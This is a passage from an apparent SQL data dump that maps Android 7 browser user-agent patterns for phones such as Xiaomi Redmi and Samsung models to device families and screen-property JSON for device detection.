Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":683,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; R8A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; R9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; RAINBOW 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; RC555L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; REVVLPLUS C3701A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; RIVIERA F10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; RIVIERA F23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; RNE-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; RNE-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; RNE-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; RNE-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; RNE-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ROBBY2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; RS988) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; RX460) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi 3S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi 4A) AppleWebKit/* (KHTML, like Gecko) Chrome','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi 4A) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi 4A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi 4X) AppleWebKit/* (KHTML, like Gecko) Chrome','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi 4X) AppleWebKit/* (KHTML, like Gecko) Chrome (beta) Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi 4X) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi 4X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi 5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi 5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi 5A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi Note 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi Note 4) AppleWebKit/* (KHTML, like Gecko) Chrome','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi Note 4) AppleWebKit/* (KHTML, like Gecko) Chrome (alpha) Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi Note 4) AppleWebKit/* (KHTML, like Gecko) Chrome (beta) Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi Note 4) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi Note 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi Note 4X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi Note 5 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi Note 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi Note 5A Prime) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi Note 5A) AppleWebKit/* (KHTML, like Gecko) Chrome','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi Note 5A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi Y1 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi Y1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi_4X) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Redmi_5) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Rio) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Robin) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Royale A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Royale Y2 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S10 PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S16) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S1a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S2 LITE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S2_LITE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S2_PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S30mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S45) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S5002) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S55A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S55B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S5LS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S60 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S60) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S6s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S70) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S8_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; S9 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SAMSUNG-SM-J320A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-A310F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-A310M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 